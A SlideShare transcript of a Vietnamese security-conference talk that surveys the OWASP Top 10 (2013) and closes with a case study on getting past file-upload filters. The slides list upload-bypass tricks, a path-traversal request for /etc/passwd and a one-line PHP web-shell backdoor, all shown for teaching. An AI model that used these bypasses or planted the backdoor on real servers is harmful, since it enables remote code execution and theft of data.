SlideShare a Scribd company logo
1 of 61
Download to read offline
TỔNG QUAN VỀ
OWASP TOP 10- 2013
Trình bày: Khổng Văn Cường
Email: cuongkv@fpt.com.vn
Đơn vị tổ chức:

Đơn vị tài trợ:
Nội dung
• Hiện trạng
• Giải pháp
• Giới thiệu tổng quan về PENTEST và
chuẩn OWASP TOP 10 phiên bản 2013.
• Các nhóm lỗi trong OWASP TOP 10
phiên bản 2013.
• Case Study : File Upload
10/23/2013 9:57 AM

www.securitybootcamp.vn
Hiện trạng

10/23/2013 9:56 AM

www.securitybootcamp.vn
Hiện trạng

10/23/2013 9:56 AM

www.securitybootcamp.vn
BẠN THẬT SỰ ĐÃ
ĐƯỢC BẢO VỆ?

10/23/2013 9:56 AM

www.securitybootcamp.vn
BẠN THẬT SỰ ĐÃ
ĐƯỢC BẢO VỆ?

10/23/2013 9:56 AM

www.securitybootcamp.vn
BẠN THẬT SỰ ĐÃ
ĐƯỢC BẢO VỆ?

10/23/2013 9:56 AM

www.securitybootcamp.vn
BẠN THẬT SỰ ĐÃ
ĐƯỢC BẢO VỆ?

10/23/2013 9:56 AM

www.securitybootcamp.vn
SOLUTION?
10/23/2013 9:56 AM

www.securitybootcamp.vn
10/23/2013 9:56 AM

www.securitybootcamp.vn
Tổng Quan Về PENTEST

• Pentest là gì ?
• Các phương pháp sử dụng trong
pentest:
– Hộp đen (Black box)
– Hộp trắng (White box)
– Hộp xám (Gray box)

10/23/2013 9:56 AM

www.securitybootcamp.vn
Tổng Quan Về PENTEST

• Phạm vi trong Pentest ?
– Network Penetration Test
– Web Application Penetration Test
– Wireless Network Penetration Test
– Physical Penetration Test

•

10/23/2013 9:56 AM

www.securitybootcamp.vn
Tổng Quan Về PENTEST

• Tiêu chuẩn để thực hiện Pentest là gì?
– Đánh giá ứng dụng Web – OWASP (Opensource Web Application Security Project)

10/23/2013 9:56 AM

www.securitybootcamp.vn
Tổng Quan Về PENTEST

• Tiêu chuẩn để thực hiện Pentest là gì?
– Đánh giá ứng dụng Web – OWASP (Opensource Web Application Security Project)
– Đánh giá mạng và hệ thống – OSSTMM
(Open Source Security Testing
Methodology Manual)

10/23/2013 9:56 AM

www.securitybootcamp.vn
OWASP là gì?

Ở OWASP bạn sẽ được cung cấp miễn phí và
mở :
• Các công cụ và các tiêu chuẩn về an toàn thông tin
• Tài liệu về kiểm tra bảo mật ứng dụng, lập trình an toàn và
kiểm định mã nguồn
• Thư viện và các tiêu chuẩn điều khiển an ninh thông tin
• Các chi nhánh của hội ở khắp thế giới
• Các nghiên cứu mới nhất
• Các buổi hội thảo toàn cầu
• Maillist chung
10/23/2013 9:56 AM

www.securitybootcamp.vn
OWASP TOP 10 phiên bản 2013

10/23/2013 9:56 AM

www.securitybootcamp.vn
A1: Injection

• Nguyên nhân: Các truy vấn đầu vào tại
ứng dụng bị chèn thêm dữ liệu không an
toàn dẫn đến mã lệnh được gởi tới máy
chủ cơ sở dữ liệu.

10/23/2013 9:56 AM

www.securitybootcamp.vn
A1: Injection

• Nguyên nhân: Các truy vấn đầu vào tại
ứng dụng bị chèn thêm dữ liệu không an
toàn dẫn đến mã lệnh được gởi tới máy
chủ cơ sở dữ liệu.

10/23/2013 9:56 AM

www.securitybootcamp.vn
A1: Injection

• Nguy cơ:
– Truy cập dữ liệu bất hợp pháp.
– Insert/update dữ liệu vào DB.
– Thực hiện một số tấn công từ chối dịch vụ
(refref, benchmark …)

10/23/2013 9:56 AM

www.securitybootcamp.vn
DEMO

Demo SQL Injection

10/23/2013 10:18 AM

www.securitybootcamp.vn
A2: Broken Authentication and
Session Management

• Điểm yếu: Cho phép hacker từ bên
ngoài có thể truy cập vào những tài
nguyên nội bộ trái phép (admin page,
inside, control page …)

10/23/2013 9:56 AM

www.securitybootcamp.vn
A2: Broken Authentication and
Session Management

• Điểm yếu: Cho phép hacker từ bên
ngoài có thể truy cập vào những tài
nguyên nội bộ trái phép (admin page,
inside, control page …)
• Ngoài ra hacker còn có thể thực hiện
các hành vi nâng quyền quản trị hoặc
tấn công dựa vào các dạng như session
fixation …
10/23/2013 9:56 AM

www.securitybootcamp.vn
A3: Cross-Site Scripting(XSS)

• Điểm yếu: Cho phép thực thi mã độc tại
máy nạn nhân (client side)
• Nguy cơ:
– Đánh cắp cookie/session
– Phát tán mã độc

10/23/2013 9:56 AM

www.securitybootcamp.vn
A3: Cross-Site Scripting(XSS)
[7] Sign in with victim’s token

[1] POST
Internet

Attacker

[2] RESPONE
[3] Invite malicious code via
Friendlist

[6]

DataBase
Web server App. server

www.server.com

Internet
[4] http://www.server.com/XSS

WebApp
vulnerabile al XSS
user
[6] Conect back
Attacker

[5] RESPONE: execute
javascript function
24
A4: Insecure Direct
Object References

• Điểm yếu: Việc phân quyền yếu (weak
authorization) cho phép người dùng có thể
truy cập dữ liệu của người dùng khác. Trong
những trường hợp hacker có thể xác định
được chính xác cấu trúc truy vấn gởi đến
server, hacker có thể nhanh chóng thu thập
dữ liệu như Credit Card, mã khách hàng,
thông tin cá nhân...
10/23/2013 9:56 AM

www.securitybootcamp.vn
A4: Insecure Direct
Object References
http://www.server.com/app/accountInfo?acct=notmyacct
http://www.server.com/app/download.php?file=../../../../etc/passwd
[1] Request
Internet

Attacker

[2] Respone

App. server

26
A5: Security Misconfiguration

• Việc thắt chặt các cấu hình bảo mật tại
các tầng trong kiến trúc web là cần thiết:
platform, OS, web server, database,
framework... nhằm tránh những nguy cơ
có thể bị khai thác vào ứng dụng.

10/23/2013 9:56 AM

www.securitybootcamp.vn
A5: Security Misconfiguration

10/23/2013 9:56 AM

www.securitybootcamp.vn
A6: Sensitive Data Exposure

• Các dữ liệu nhạy cảm được lưu trữ
không an toàn có thể gây ra những ảnh
hưởng to lớn cho hệ thống máy chủ,
cũng như cho khách hàng.

10/23/2013 9:56 AM

www.securitybootcamp.vn
A6: Sensitive Data Exposure

• Tình huống 1: Thẻ tín dụng/Tài khoản
đăng nhập được lưu trữ cleartext.

10/23/2013 9:56 AM

www.securitybootcamp.vn
A6: Sensitive Data Exposure

• Tình huống 1: Thẻ tín dụng/Tài khoản
đăng nhập được lưu trữ cleartext.
• Tình huống 2: Kênh truyền HTTPS bị
hacker nghe lén và dữ liệu được giải mã
thông qua lỗ hổng CRIME

10/23/2013 9:56 AM

www.securitybootcamp.vn
A7: Missing Function
Level Access Control
http://admin.server.com/

10/23/2013 9:56 AM

www.securitybootcamp.vn
A7: Missing Function
Level Access Control
http://admin.server.com/admin.php

10/23/2013 9:56 AM

www.securitybootcamp.vn
A8: Cross-Site Request Forgery

• Với những hệ thống thanh toán không
kiểm tra tính hợp lệ của
token/Session/Domain... thì nguy cơ
người dùng bị mất tiền do bị lừa thực
hiện các mã kịch bản không mong muốn
từ các site lừa đảo.

10/23/2013 9:56 AM

www.securitybootcamp.vn
A8: Cross-Site Request Forgery

http://www.server.com/app/checkout.php?
merchantid=10&customer=541&amount=500&currentcy=us
[1] Request

Victim

Internet
[3] Respone

App. server
[4] Respone +
merchantid=10&custom
Request er=606&amount=500&cu
[2] Request rrentcy=us

35
A9: Using Components
with Known Vulnerabilities

• Điểm yếu: Việc sử dụng các lỗ hổng bảo
mật trong các thư viện, plugin, module,
ứng dụng... được công khai trong cộng
đồng giúp hacker nhanh chóng khai thác
các lỗ hổng bảo mật.

10/23/2013 9:56 AM

www.securitybootcamp.vn
A9: Using Components
with Known Vulnerabilities

10/23/2013 9:56 AM

www.securitybootcamp.vn
A9: Using Components
with Known Vulnerabilities

10/23/2013 9:56 AM

www.securitybootcamp.vn
A9: Using Components
with Known Vulnerabilities

10/23/2013 9:56 AM

www.securitybootcamp.vn
A9: Using Components
with Known Vulnerabilities

• Khuyến cáo: Các bản vá bảo mật từ nhà
phát triển ứng dụng sẽ giúp ứng dụng
giảm thiểu các rủi ro khai thác.

10/23/2013 9:56 AM

www.securitybootcamp.vn
A10: Unvalidated Redirects
and Forwards

• Việc chuyển hướng không an toàn
người dùng đến một đường dẫn bên
ngoài trang có thể tạo nguy cơ người
dùng truy cập đến những trang chứa mã
độc nhằm đánh cắp dữ liệu cá nhân.

10/23/2013 9:56 AM

www.securitybootcamp.vn
A10: Unvalidated Redirects
and Forwards

http://www.server.com/app/redirect.php?url=http://www.evil.com/malicious.htm
[2] Request

Victim

Internet
[3] Respone

App. server
[4]
http://www.ev
il.com/malicio
us.html

[1] Send URL
to victim

Attacker
42
Tổng Kết

10/23/2013 9:56 AM

www.securitybootcamp.vn
Tổng kết

10/23/2013 9:56 AM

www.securitybootcamp.vn
DEMO

Demo Business Logic Testing

10/23/2013 10:27 AM

www.securitybootcamp.vn
Case Study : File Upload

• Protection bằng Content-Type

• Có thể dễ dàng thay đổi “Content-Type”

10/23/2013 10:01 AM

www.securitybootcamp.vn
1. Name and Extension
• File Extension in “test.php.jpg”?
“.php.jpg”?
“.jpg”

10/23/2013 9:56 AM

www.securitybootcamp.vn
Bỏ qua Extensions

• Kiểm tra thực thi extensions:
• “.php” thường bị khóa, vậy “.php3”,
“.php4”, “.phtml”, thì như thế nào?
• Tương tự cho “.asp” thường bị khóa 
“.asa” or “.cer” thì sao?
• Còn client side extensions thì sao?
.htm, .html, .swf, .jar, …?
10/23/2013 9:56 AM

www.securitybootcamp.vn
2. Double Extensions

• Cấu hình trong Apache
– “file.php.jpg” served chạy PHP
– “AddHandler application/x-httpd-php .php”

• Cấu hình trong IIS 6 thì:
– “file.asp;.jpg”  Chạy file ASP
– “/folder.asp/file.txt”  Chạy file ASP
10/23/2013 9:56 AM

www.securitybootcamp.vn
DEMO

Demo Remote Code
Execution On Nginx Server

10/23/2013 9:56 AM

www.securitybootcamp.vn
3. Case Sensitive Rules

• Ví dụ:
– Blacklist RegEx: “^.php$”
• “file.php” != “file.PhP”

– “file.php3.jpg” != “file.PHP3.JpG”

10/23/2013 9:56 AM

www.securitybootcamp.vn
4. Windows 8.3

• Ghi đè các file nhạy cảm như:
– “web.config” == “WEB~1.con”
– “default.aspx” == “DEFAUL~1.asp”
• Trường hợp không extensions thì có
cho phép?
– “.htaccess” == “HTACCE~1”

10/23/2013 9:56 AM

www.securitybootcamp.vn
5. Windows File System

• Cuối tập tin thường bị bỏ qua:
– Ví dụ dấu chấm và ký tự space
• “test.asp … . .. .” == “test.asp”

– Hoặc file:
• “test.php<>” == “test.php”

10/23/2013 9:56 AM

www.securitybootcamp.vn
5. Windows File System

• NTFS Alternate Data Streams:
– “file.asp::$data” == “file.asp”
– “/folder:$i30:$Index_allocation” == “/folder”
– “.htaccess:.jpg”  make empty “.htaccess”
== “HTACCE~1” …

10/23/2013 9:56 AM

www.securitybootcamp.vn
6. File Type Detector Issues
• Trường hợp Height/Width của file image?
• Ví dụ: Comments trong file jpeg:

10/23/2013 9:56 AM

www.securitybootcamp.vn
7. Null Character

• “file.php%00.jpg”

10/23/2013 9:56 AM

www.securitybootcamp.vn
8. Compression (Image) Issues

Việc nén file .png có thể chứa code php

PNG Image

10/23/2013 11:06 AM

Compression

www.securitybootcamp.vn

PNG with
PHP code!
8. GZIP Compression  PHP Code

• Dữ liệu Text …

- Nén Gzip

• Chúng ta có PHP backdoor:
– <?=$_GET[0]($_POST[1]);?>
10/23/2013 11:15 AM

www.securitybootcamp.vn
DEMO
DEMO RISKY FUNCTIONALITY FILE UPLOADS

10/23/2013 10:10 AM

www.securitybootcamp.vn
Thank You!
&
Question
10/23/2013 9:56 AM

www.securitybootcamp.vn

More Related Content

What's hot

Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNgoc Dao
 
Trung tâm đào tạo
Trung tâm đào tạoTrung tâm đào tạo
Trung tâm đào tạoLuc Cao
 
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)Luc Cao
 
Sql injection lab_5477
Sql injection lab_5477Sql injection lab_5477
Sql injection lab_5477oncestar
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongVu Trung Kien
 
báo cáo thực tập Athena - tuần1
báo cáo thực tập Athena - tuần1báo cáo thực tập Athena - tuần1
báo cáo thực tập Athena - tuần1Luc Cao
 
Báo cáo SQL injecttion
Báo cáo SQL injecttionBáo cáo SQL injecttion
Báo cáo SQL injecttionDuy Nguyenduc
 
Sql injection demo - it-slideshares.blogspot.com
Sql injection   demo - it-slideshares.blogspot.comSql injection   demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.comphanleson
 
Tan cong
Tan congTan cong
Tan congtoan
 
Tấn công sql injection sử dụng câu lệnh select union
Tấn công sql injection sử dụng câu lệnh select unionTấn công sql injection sử dụng câu lệnh select union
Tấn công sql injection sử dụng câu lệnh select unionNguyễn Danh Thanh
 
XSS & SQL injection
XSS & SQL injectionXSS & SQL injection
XSS & SQL injectionThieu Mao
 
Sql injection it-slideshares.blogspot.com
Sql injection it-slideshares.blogspot.comSql injection it-slideshares.blogspot.com
Sql injection it-slideshares.blogspot.comphanleson
 
Chương 6 Bảo mật - Giáo trình FPT
Chương 6 Bảo mật - Giáo trình FPTChương 6 Bảo mật - Giáo trình FPT
Chương 6 Bảo mật - Giáo trình FPTMasterCode.vn
 
Sql injection bao cao - http://ouo.io/Mqc8L5
Sql injection bao cao - http://ouo.io/Mqc8L5Sql injection bao cao - http://ouo.io/Mqc8L5
Sql injection bao cao - http://ouo.io/Mqc8L5phanleson
 
Athena báo cáo thực tập tuần 2
Athena báo cáo thực tập tuần 2Athena báo cáo thực tập tuần 2
Athena báo cáo thực tập tuần 2Luc Cao
 
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...MasterCode.vn
 
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...MasterCode.vn
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6phanconghien
 

What's hot (20)

Những lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần applicationNhững lỗi bảo mật web thường gặp ở phần application
Những lỗi bảo mật web thường gặp ở phần application
 
Trung tâm đào tạo
Trung tâm đào tạoTrung tâm đào tạo
Trung tâm đào tạo
 
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
 
Sql injection lab_5477
Sql injection lab_5477Sql injection lab_5477
Sql injection lab_5477
 
Tim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chongTim hieu lo hong web va cach phong chong
Tim hieu lo hong web va cach phong chong
 
báo cáo thực tập Athena - tuần1
báo cáo thực tập Athena - tuần1báo cáo thực tập Athena - tuần1
báo cáo thực tập Athena - tuần1
 
Báo cáo SQL injecttion
Báo cáo SQL injecttionBáo cáo SQL injecttion
Báo cáo SQL injecttion
 
Sql injection demo - it-slideshares.blogspot.com
Sql injection   demo - it-slideshares.blogspot.comSql injection   demo - it-slideshares.blogspot.com
Sql injection demo - it-slideshares.blogspot.com
 
Tan cong
Tan congTan cong
Tan cong
 
Tấn công sql injection sử dụng câu lệnh select union
Tấn công sql injection sử dụng câu lệnh select unionTấn công sql injection sử dụng câu lệnh select union
Tấn công sql injection sử dụng câu lệnh select union
 
SQL injection
SQL injectionSQL injection
SQL injection
 
XSS & SQL injection
XSS & SQL injectionXSS & SQL injection
XSS & SQL injection
 
Sql injection it-slideshares.blogspot.com
Sql injection it-slideshares.blogspot.comSql injection it-slideshares.blogspot.com
Sql injection it-slideshares.blogspot.com
 
Chương 6 Bảo mật - Giáo trình FPT
Chương 6 Bảo mật - Giáo trình FPTChương 6 Bảo mật - Giáo trình FPT
Chương 6 Bảo mật - Giáo trình FPT
 
Sql injection bao cao - http://ouo.io/Mqc8L5
Sql injection bao cao - http://ouo.io/Mqc8L5Sql injection bao cao - http://ouo.io/Mqc8L5
Sql injection bao cao - http://ouo.io/Mqc8L5
 
Athena báo cáo thực tập tuần 2
Athena báo cáo thực tập tuần 2Athena báo cáo thực tập tuần 2
Athena báo cáo thực tập tuần 2
 
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
 
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
 
Bao caocuoiki
Bao caocuoikiBao caocuoiki
Bao caocuoiki
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
 

Viewers also liked

Anatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilitiesAnatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilitiesDaveEdwards12
 
Security Exploit of Business Logic Flaws, Business Logic Attacks
Security Exploit of Business Logic Flaws, Business Logic AttacksSecurity Exploit of Business Logic Flaws, Business Logic Attacks
Security Exploit of Business Logic Flaws, Business Logic AttacksMarco Morana
 
Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Ajay Negi
 
Defying Logic - Business Logic Testing with Automation
Defying Logic - Business Logic Testing with AutomationDefying Logic - Business Logic Testing with Automation
Defying Logic - Business Logic Testing with AutomationRafal Los
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
Báo Cáo Quản Lý Dự Án Mẫu
Báo Cáo Quản Lý Dự Án MẫuBáo Cáo Quản Lý Dự Án Mẫu
Báo Cáo Quản Lý Dự Án MẫuHiệp Nguyễn
 
Lập kế hoạch cho dự án
Lập kế hoạch cho dự ánLập kế hoạch cho dự án
Lập kế hoạch cho dự ánAnh Dam
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Quản trị dự án công nghệ thông tin
Quản trị dự án công nghệ thông tinQuản trị dự án công nghệ thông tin
Quản trị dự án công nghệ thông tinAnh Dam
 

Viewers also liked (11)

Anatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilitiesAnatomy of business logic vulnerabilities
Anatomy of business logic vulnerabilities
 
Security Exploit of Business Logic Flaws, Business Logic Attacks
Security Exploit of Business Logic Flaws, Business Logic AttacksSecurity Exploit of Business Logic Flaws, Business Logic Attacks
Security Exploit of Business Logic Flaws, Business Logic Attacks
 
Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)
 
Defying Logic - Business Logic Testing with Automation
Defying Logic - Business Logic Testing with AutomationDefying Logic - Business Logic Testing with Automation
Defying Logic - Business Logic Testing with Automation
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Báo Cáo Quản Lý Dự Án Mẫu
Báo Cáo Quản Lý Dự Án MẫuBáo Cáo Quản Lý Dự Án Mẫu
Báo Cáo Quản Lý Dự Án Mẫu
 
Lập kế hoạch cho dự án
Lập kế hoạch cho dự ánLập kế hoạch cho dự án
Lập kế hoạch cho dự án
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Giáo trình quản lý dự án
Giáo trình quản lý dự ánGiáo trình quản lý dự án
Giáo trình quản lý dự án
 
Quản trị dự án công nghệ thông tin
Quản trị dự án công nghệ thông tinQuản trị dự án công nghệ thông tin
Quản trị dự án công nghệ thông tin
 

Similar to Security Bootcamp 2013 owasp top 10- 2013

Dịch vụ squid server
Dịch vụ squid serverDịch vụ squid server
Dịch vụ squid serverTan Phat Phung
 
Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huyhoaihuysc
 
Dos web server it-slideshares.blogspot.com
Dos web server it-slideshares.blogspot.comDos web server it-slideshares.blogspot.com
Dos web server it-slideshares.blogspot.comphanleson
 
Trần Anh Khoa - Kautilya và Powershell trong kỹ thuật tấn công tiếp cận
Trần Anh Khoa - Kautilya và Powershelltrong kỹ thuật tấn công tiếp cậnTrần Anh Khoa - Kautilya và Powershelltrong kỹ thuật tấn công tiếp cận
Trần Anh Khoa - Kautilya và Powershell trong kỹ thuật tấn công tiếp cậnSecurity Bootcamp
 
Go micro framework to build microservices
Go micro framework to build microservicesGo micro framework to build microservices
Go micro framework to build microservicesTechMaster Vietnam
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaÂu Dương Bình
 
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chốngĐồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chốngnataliej4
 
Run Openstack with SSL
Run Openstack with SSLRun Openstack with SSL
Run Openstack with SSLLam To
 
Authentication and Authorization
Authentication and AuthorizationAuthentication and Authorization
Authentication and AuthorizationTechMaster Vietnam
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6kakawpah0911
 
An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server
An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server
An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server nataliej4
 
Bai18 web app_security_scheme
Bai18 web app_security_schemeBai18 web app_security_scheme
Bai18 web app_security_schemeHoang Son
 
KyngheYC_Requirements 18.pptx
KyngheYC_Requirements 18.pptxKyngheYC_Requirements 18.pptx
KyngheYC_Requirements 18.pptxssuser73ecd9
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 

Similar to Security Bootcamp 2013 owasp top 10- 2013 (20)

ATTT.pptx
ATTT.pptxATTT.pptx
ATTT.pptx
 
Dịch vụ squid server
Dịch vụ squid serverDịch vụ squid server
Dịch vụ squid server
 
Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
 
Dos web server it-slideshares.blogspot.com
Dos web server it-slideshares.blogspot.comDos web server it-slideshares.blogspot.com
Dos web server it-slideshares.blogspot.com
 
Trần Anh Khoa - Kautilya và Powershell trong kỹ thuật tấn công tiếp cận
Trần Anh Khoa - Kautilya và Powershelltrong kỹ thuật tấn công tiếp cậnTrần Anh Khoa - Kautilya và Powershelltrong kỹ thuật tấn công tiếp cận
Trần Anh Khoa - Kautilya và Powershell trong kỹ thuật tấn công tiếp cận
 
Báo cáo tuần đồ án
Báo cáo tuần đồ ánBáo cáo tuần đồ án
Báo cáo tuần đồ án
 
Go micro framework to build microservices
Go micro framework to build microservicesGo micro framework to build microservices
Go micro framework to build microservices
 
Báo cáo cuối kỳ
Báo cáo cuối kỳBáo cáo cuối kỳ
Báo cáo cuối kỳ
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chốngĐồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
 
Run Openstack with SSL
Run Openstack with SSLRun Openstack with SSL
Run Openstack with SSL
 
Authentication and Authorization
Authentication and AuthorizationAuthentication and Authorization
Authentication and Authorization
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
 
An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server
An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server
An Ninh Mạng Và Kỹ Thuật Tấn Công Web Server
 
Bai18 web app_security_scheme
Bai18 web app_security_schemeBai18 web app_security_scheme
Bai18 web app_security_scheme
 
Arrowjs.io
Arrowjs.ioArrowjs.io
Arrowjs.io
 
KyngheYC_Requirements 18.pptx
KyngheYC_Requirements 18.pptxKyngheYC_Requirements 18.pptx
KyngheYC_Requirements 18.pptx
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Luận văn: Kỹ thuật điều tra phân tích tấn công web, HAY
Luận văn: Kỹ thuật điều tra phân tích tấn công web, HAYLuận văn: Kỹ thuật điều tra phân tích tấn công web, HAY
Luận văn: Kỹ thuật điều tra phân tích tấn công web, HAY
 

More from Security Bootcamp

Ransomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfRansomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfSecurity Bootcamp
 
Hieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurityHieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecuritySecurity Bootcamp
 
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s viewNguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s viewSecurity Bootcamp
 
Sbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe moSbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe moSecurity Bootcamp
 
Giam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdrGiam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdrSecurity Bootcamp
 
Insider threat-what-us-do d-want
Insider threat-what-us-do d-wantInsider threat-what-us-do d-want
Insider threat-what-us-do d-wantSecurity Bootcamp
 
Macro malware common techniques - public
Macro malware   common techniques - publicMacro malware   common techniques - public
Macro malware common techniques - publicSecurity Bootcamp
 
Malware detection-using-machine-learning
Malware detection-using-machine-learningMalware detection-using-machine-learning
Malware detection-using-machine-learningSecurity Bootcamp
 
Tim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cuTim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cuSecurity Bootcamp
 
Threat detection with 0 cost
Threat detection with 0 costThreat detection with 0 cost
Threat detection with 0 costSecurity Bootcamp
 
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET -  Hiểm hoa tiềm ẩn trong hệ thống Active DirectoryGOLDEN TICKET -  Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active DirectorySecurity Bootcamp
 
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
